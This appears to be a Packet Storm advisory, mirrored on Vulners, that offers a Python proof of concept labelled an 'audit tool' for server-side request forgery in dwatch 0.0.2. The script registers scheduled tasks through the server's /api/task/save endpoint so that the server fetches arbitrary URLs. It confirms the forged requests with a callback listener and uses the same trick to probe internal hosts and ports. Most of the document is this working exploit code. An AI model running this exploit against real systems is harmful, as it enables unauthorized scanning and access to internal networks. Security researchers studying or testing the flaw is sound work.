Lucene search
K

📄 dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool

🗓️ 01 Jun 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 56 Views

Security tool to test network boundaries and detect server side request forgery behavior.

Code
==================================================================================================================================
    | # Title     : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool                                                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://github.com/dhjz/dwatch/                                                                                  |
    ==================================================================================================================================
    
    [+] Summary    : a security utility to test network boundary enforcement and detect potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.
    				 
    [+] POC        : 
    
    #!/usr/bin/env python3
    
    
    import re
    import csv
    import json
    import time
    import socket
    import logging
    import threading
    import argparse
    import urllib3
    from pathlib import Path
    from datetime import datetime
    from typing import Dict, List, Optional, Tuple
    from urllib.parse import urlparse, urljoin
    import requests
    
    logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] - %(message)s')
    logger = logging.getLogger("DWatchAuditor")
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    
    class DWatchAuditorCore:
        """Main engine: Responsible for managing the connection to the dwatch server and checking network restrictions."""
    
        def __init__(self, target: str, callback_host: Optional[str] = None,
                     callback_port: int = 8888, verbose: bool = False):
    
            parsed = urlparse(target if "://" in target else f"http://{target}")
            if not parsed.netloc:
                raise ValueError(f"Invalid target URL structure: {target}")
    
            path = parsed.path if parsed.path else ""
            self.base_url = f"{parsed.scheme}://{parsed.netloc}{path}".rstrip("/")
    
            self.callback_host = callback_host
            self.callback_port = callback_port
            self.verbose = verbose
    
            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor/1.0',
                'Content-Type': 'application/json'
            })
    
            self.save_endpoint = urljoin(self.base_url + "/", "api/task/save")
            self.created_tasks: List[Dict] = []
    
            self.callback_event = threading.Event()
            self.callback_data: List[Dict] = []
            self.lock = threading.Lock()
    
        def _get_local_ip(self) -> str:
            try:
                with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
                    s.connect(("8.8.8.8", 80))
                    return s.getsockname()[0]
            except Exception:
                return "127.0.0.1"
    
        def create_audit_task(self, name: str, payload_url: str, spec: str = "*/5 * * * * *") -> bool:
            payload = {"name": name, "url": payload_url, "spec": spec}
    
            try:
                if self.verbose:
                    logger.info(f"Submitting audit payload: {name} -> {payload_url}")
    
                response = self.session.post(self.save_endpoint, json=payload, timeout=10)
    
                if response.status_code == 200 and response.text:
                    logger.info(f"Audit task '{name}' registered successfully.")
                    self.created_tasks.append({'name': name, 'url': payload_url, 'spec': spec})
                    return True
    
                logger.error(f"Failed to create task. HTTP Status: {response.status_code}")
                return False
    
            except requests.RequestException as e:
                logger.error(f"Network transport error during task creation: {e}")
                return False
    
        def verify_boundary_leak(self) -> bool:
            if not self.callback_host:
                self.callback_host = self._get_local_ip()
    
            timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
            callback_url = f"http://{self.callback_host}:{self.callback_port}/ssrf_token_{timestamp}"
    
            logger.info(f"Callback URL: {callback_url}")
            self.callback_event.clear()
    
            server_thread = threading.Thread(target=self._run_callback_socket)
            server_thread.daemon = True
            server_thread.start()
    
            time.sleep(0.5)
    
            task_name = f"Boundary_Audit_{timestamp}"
    
            if self.create_audit_task(task_name, callback_url, spec="* * * * * *"):
                logger.info("Waiting for inbound connection (timeout 12s)...")
    
                triggered = self.callback_event.wait(timeout=12)
    
                if triggered:
                    logger.critical("SSRF outbound boundary breach confirmed!")
                    self.callback_event.set()
                    server_thread.join(timeout=1)
                    return True
                else:
                    logger.warning("No inbound request captured.")
                    self.callback_event.set()
                    server_thread.join(timeout=1)
                    return False
    
            return False
    
        def _run_callback_socket(self):
            server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    
            try:
                server_socket.bind(("0.0.0.0", self.callback_port))
                server_socket.listen(1)
                server_socket.settimeout(12)
    
                while not self.callback_event.is_set():
                    try:
                        client, addr = server_socket.accept()
                        self.callback_event.set()
    
                        raw_request = client.recv(2048).decode("utf-8", errors="ignore")
    
                        with self.lock:
                            self.callback_data.append({"sender": addr, "raw": raw_request})
    
                        logger.info(f"Inbound connection from {addr[0]}:{addr[1]}")
    
                        try:
                            client.sendall(
                                b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"
                            )
                        finally:
                            client.close()
    
                    except socket.timeout:
                        continue
    
            except Exception as e:
                logger.error(f"Callback listener error: {e}")
    
            finally:
                server_socket.close()
    
        def check_internal_service(self, host: str, port: int) -> Dict:
            url = f"http://{host}:{port}/"
            task_name = f"service_recon_{port}_{int(time.time())}"
    
            success = self.create_audit_task(task_name, url, spec="*/5 * * * * *")
    
            return {
                "port": port,
                "task_accepted": success,
                "inference": (
                    "Task submitted - requires log verification"
                    if success else "Blocked or unreachable endpoint"
                )
            }
    
    
    class InteractiveConsoleInterface:
        """User interface"""
    
        def __init__(self, auditor: DWatchAuditorCore):
            self.auditor = auditor
    
        def display_menu(self):
            while True:
                print("\n" + "=" * 50)
                print("dwatch SSRF Boundary Auditor")
                print("=" * 50)
                print("1. Run SSRF Test")
                print("2. Check Internal Port")
                print("3. Create Task")
                print("4. View Tasks")
                print("5. Exit")
    
                choice = input("> ").strip()
    
                if choice == "1":
                    self.auditor.verify_boundary_leak()
    
                elif choice == "2":
                    host = input("Host: ").strip() or "127.0.0.1"
                    try:
                        port = int(input("Port: ").strip())
                    except ValueError:
                        print("Invalid port")
                        continue
    
                    print(json.dumps(self.auditor.check_internal_service(host, port), indent=2))
    
                elif choice == "3":
                    name = input("Task name: ").strip()
                    url = input("URL: ").strip()
                    self.auditor.create_audit_task(name, url)
    
                elif choice == "4":
                    print(json.dumps(self.auditor.created_tasks, indent=2))
    
                elif choice == "5":
                    break
    
    
    def main():
        parser = argparse.ArgumentParser()
        parser.add_argument("-t", "--target", required=True)
        parser.add_argument("-c", "--callback")
        parser.add_argument("-i", "--interactive", action="store_true")
        parser.add_argument("-v", "--verbose", action="store_true")
        args = parser.parse_args()
    
        callback_host = None
        callback_port = 8888
    
        if args.callback:
            parts = args.callback.rsplit(":", 1)
            callback_host = parts[0]
            if len(parts) == 2:
                callback_port = int(parts[1])
    
        try:
            auditor = DWatchAuditorCore(
                target=args.target,
                callback_host=callback_host,
                callback_port=callback_port,
                verbose=args.verbose
            )
    
            if args.interactive:
                InteractiveConsoleInterface(auditor).display_menu()
            else:
                logger.info("Running SSRF boundary check...")
                auditor.verify_boundary_leak()
    
        except Exception as e:
            logger.critical(f"Fatal error: {e}")
    
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jun 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
56